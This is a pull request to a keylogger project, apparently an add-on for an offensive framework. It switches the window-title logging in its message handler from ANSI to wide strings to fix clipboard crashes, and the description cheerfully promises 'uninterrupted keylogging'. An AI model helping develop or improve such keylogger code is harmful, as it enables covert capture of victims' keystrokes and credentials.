### PR TITLE
FIX crashes when copying some unicode strings into clipboard

### DIFF
--- a/SliverKeylogger/WinMsgHandler.cpp
+++ b/SliverKeylogger/WinMsgHandler.cpp
@@ -153,21 +153,21 @@ LRESULT WinMsgHandler::classHandleMsg(HWND hWnd, UINT message, WPARAM wParam, LP
 
 void WinMsgHandler::checkFocus(UINT keyChar)
 {
-	CHAR window_title[256] = "";
-	CHAR wt[300] = "";
+	WCHAR window_title[256] = L"";
+	WCHAR wt[300] = L"";
 	SYSTEMTIME curr_time;
 	GetLocalTime(&curr_time);
 
 	auto hActiveWindow = GetForegroundWindow();
-	GetWindowTextA(hActiveWindow, window_title, 256);
+	GetWindowTextW(hActiveWindow, window_title, 256);
 
 	//Insert reference to the current window
 	if ((hActiveWindow != hPrevWind)) {
 
-		snprintf(wt, 299, "\r\n%d-%d-%d %d:%d [ %s ]\r\n", curr_time.wYear, curr_time.wMonth,
+		swprintf(wt, 300, L"\r\n%hu-%hu-%hu %hu:%hu [ %s ]\r\n", curr_time.wYear, curr_time.wMonth,
 			curr_time.wDay, curr_time.wHour, curr_time.wMinute, window_title);
 
-		_queue->Push(std::string(wt));
+		_queue->Push(std::wstring(wt));
 		hPrevWind = hActiveWindow;
 	}
 }


### PR DESCRIPTION
FIX crashes when copying some unicode strings into clipboard by removing unnecessary UTF/ANSI conversions.

Now you can enjoy hours of uninterrupted keylogging !